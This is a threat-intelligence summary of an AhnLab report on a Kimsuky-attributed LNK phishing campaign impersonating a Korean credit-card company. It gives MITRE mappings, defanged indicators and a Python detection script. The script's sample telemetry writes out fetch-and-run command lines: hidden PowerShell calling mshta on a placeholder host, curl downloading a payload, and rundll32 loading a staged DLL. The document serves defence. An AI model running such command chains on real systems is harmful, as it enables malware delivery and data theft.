Don’t trust ‘secure mail’! malicious Files Impersonating Credit Card Companies Are Being Distributed

AhnLab confirmed a campaign distributing malicious LNK files disguised as security emails from a major Korean credit card company. The loader takes one of two payload paths depending on whether Windows Defender is running. The attack deploys backdoors and infostealers such as notepad.log, net, and APP that steal browser, mail, wallet, and clipboard data and log keystrokes; the infrastructure includes payloads hosted on Google Drive and configuration files for the MeshAgent remote management tool. #AhnLab #Kimsuky #WindowsDefender #MeshAgent

Keypoints

  • Malicious LNK files were distributed as if they were security emails from a major credit card company in Korea.
  • The attack resembles a prior Kimsuky LNK campaign, but changes behavior based on the state of Windows Defender.
  • When Windows Defender is running, the malware downloads an encrypted pipe.log, decrypts it into pipe.zip, and extracts scripts and logs for theft and backdoor activity.
  • When Windows Defender is stopped, it downloads user.txt and sys.log, decrypts sys.log into sys.dll, and loads it with rundll32.
  • The extracted components include backdoor and infostealer payloads that perform remote command execution, file collection, browser data theft, keylogging, and clipboard theft.
  • One payload targets Chrome, Edge, and Whale cookies, while another steals account data from Chrome, Firefox, Thunderbird, Group Mail, and IncrediMail.
  • AhnLab advises users to verify file origins and types, and organizations to inspect suspicious registry entries and file creation in %TEMP% and %LOCALAPPDATA%.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The victim is lured into opening a disguised file attached to a fake security email (‘malicious files disguised as security emails’ and ‘tricks users into executing malicious files’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – The LNK file runs PowerShell, which in turn invokes mshta (‘execute the mshta command through PowerShell’).
  • [T1218.005] System Binary Proxy Execution: Mshta – mshta.exe executes a remote HTA file (‘an HTA file that exists at a specific address is executed via mshta.exe’).
  • [T1027] Obfuscated Files or Information – The HTA contains obfuscated VBScript and Base64-encoded content (‘contains obfuscated VBScript code’ and ‘Base64 encoded form’).
  • [T1105] Ingress Tool Transfer – Additional payloads and a decoy document are downloaded from remote locations including Google Drive (‘downloads and executes a decoy document’ and ‘downloads additional malicious files’).
  • [T1036] Masquerading – The lure is disguised as a legitimate document, and encrypted payloads are stored under innocuous names such as pipe.log, user.txt, and sys.log (‘looks like a legitimate document’ and ‘disguised as security emails’).
  • [T1518.001] Software Discovery: Security Software Discovery – The loader checks whether Windows Defender is running and selects its payload path accordingly (‘checks whether the Windows Defender security service is running’).
  • [T1057] Process Discovery – The APP component scans for the chrome.exe process before injecting into it (‘scans the chrome.exe process’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Payloads are fetched over HTTPS from Google Drive URLs (‘download URL’ and ‘Hxxps://drive.google[.]com/uc?export=download’).
  • [T1219] Remote Access Software – Configuration files for the MeshAgent remote management tool are downloaded (‘download remote management tool (MeshAgent) configuration files’); the backdoor’s own remote command execution is part of its command-and-control channel rather than a lateral-movement technique.
  • [T1005] Data from Local System – The malware reads local file contents for execution and collects file and directory information (‘reads the contents of the file’ and ‘collecting file and directory information’).
  • [T1056.001] Input Capture: Keylogging – One component records keystrokes (‘performs keylogging’).
  • [T1115] Clipboard Data – Clipboard contents are collected by a malicious file (‘clipboard Data collection’ and ‘clipboard data stealing functions’).
  • [T1055] Process Injection – APP injects decrypted code into the main Chrome process (‘inject decrypted code into the main Chrome process’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – AhnLab’s remediation guidance points to registry entries as the persistence artifact to inspect (‘check the registered registry and delete any suspicious registry entries’).

Indicators of Compromise

  • [File names] Malicious payloads and staging files – pipe.log, pipe.zip, 1.log, 1.ps1, 2.log, user.txt, sys.log, sys.dll, notepad.log, net, app.
  • [URLs] Download locations for additional payloads (IDs truncated in the source) – Hxxps://drive.google[.]com/uc?export=download&id=1veetviG********, Hxxps://drive.google[.]com/uc?export=download&id=1PTs95g********, and Hxxps://drive.google[.]com/uc?export=download&id=1EkyeoS********.
  • [File paths] Staging and extraction locations – %LOCALAPPDATA%\pipe, %LOCALAPPDATA%\notepad.log, %LOCALAPPDATA%\net, %LOCALAPPDATA%\app, and %TEMP%.
  • [Process names and strings] Binaries used for execution and names referenced in environment checks – mshta.exe, curl, rundll32, chrome.exe, VBox, and VM.
  • [Cloud/service references] Infrastructure and tool artifacts – Google Drive direct-download URLs and MeshAgent configuration files.
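The execution chain in the MITRE section (LNK → PowerShell → mshta → curl or rundll32) and the file-name and path indicators above can be turned into a small host-telemetry detection. The following is an added example written for this page, not AhnLab's code or part of the original report. It runs over a handful of constructed process-creation records in Sysmon Event ID 1 style (the field names, sample paths, the placeholder Google Drive ID, and the DLL export name are assumptions) and maps each match to the technique IDs used above, adding T1218.011 (System Binary Proxy Execution: Rundll32) for the rundll32 step, which the report describes but does not map.

```python
"""Detection logic for the LNK -> PowerShell -> mshta -> curl/rundll32 chain.

Added example, not AhnLab's code. Events below are constructed sample
telemetry in Sysmon Event ID 1 style; field names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon EID 1 style; field names assumed)."""
    parent_image: str
    image: str
    command_line: str


# Staging/payload names listed in the report; pipe.zip and sys.dll are the decrypted forms.
STAGING_NAMES = {"pipe.log", "pipe.zip", "1.log", "1.ps1", "2.log",
                 "user.txt", "sys.log", "sys.dll", "notepad.log"}
# User-writable locations the report names (%TEMP%, %LOCALAPPDATA%) plus their expanded form.
USER_WRITABLE = re.compile(r"%LOCALAPPDATA%|%TEMP%|\\AppData\\Local\\", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
GDRIVE_DL = re.compile(r"drive\.google\.com/uc\?export=download", re.IGNORECASE)
FILE_REF = re.compile(r"[\w.-]+\.(?:log|zip|ps1|txt|dll)\b", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (technique, reason) pairs for one event; an empty list means no match."""
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    cmd = ev.command_line
    hits: list[tuple[str, str]] = []

    if image == "powershell.exe" and "mshta" in cmd.lower():
        hits.append(("T1059.001", "PowerShell command line invokes mshta"))
    if image == "mshta.exe" and parent == "powershell.exe":
        hits.append(("T1218.005", "mshta.exe spawned by PowerShell"))
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append(("T1218.005", "mshta.exe given a remote HTA URL"))
    if image == "curl.exe" and GDRIVE_DL.search(cmd):
        hits.append(("T1105", "curl fetching a Google Drive direct-download URL"))
    if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
        hits.append(("T1218.011", "rundll32 loading a DLL from a user-writable path"))

    # Known staging names only matter when they sit in %LOCALAPPDATA%/%TEMP%.
    staged = sorted({m.lower() for m in FILE_REF.findall(cmd)} & STAGING_NAMES)
    if staged and USER_WRITABLE.search(cmd):
        hits.append(("T1036", "known staging name(s) under %LOCALAPPDATA%/%TEMP%: "
                     + ", ".join(staged)))
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[tuple[str, str]]]:
    """Map event index -> hits, keeping only events that matched at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


def techniques_seen(events: list[ProcEvent]) -> set[str]:
    """Set of technique IDs observed across all events."""
    return {t for hits in scan(events).values() for t, _ in hits}


# Constructed sample telemetry (not taken from the report). URLs, IDs and export name are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "mshta http://example.invalid/x.hta"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://example.invalid/x.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\curl.exe",
              r'curl -L "https://drive.google.com/uc?export=download&id=PLACEHOLDER" '
              r"-o %LOCALAPPDATA%\pipe\pipe.log"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe %LOCALAPPDATA%\sys.dll,EntryPoint"),
    ProcEvent(r"C:\Windows\explorer.exe",          # benign control record
              r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\alice\Documents\notes.txt"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        for technique, reason in hits:
            print(f"event {idx}: {technique} {reason}")
    print("techniques:", sorted(techniques_seen(SAMPLE_EVENTS)))
```

The rules are deliberately narrow: a PowerShell command line mentioning mshta, mshta with a remote URL, curl pulling a Google Drive direct-download link, and rundll32 loading a DLL from a user-writable directory are each individually noisy in some environments, but two or more of them on one host within a short window, or any of them combined with one of the report's staging names under %LOCALAPPDATA% or %TEMP%, is a strong signal worth an alert. Field names and paths should be adjusted to the telemetry format actually collected.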


Read more: https://asec.ahnlab.com/en/93855/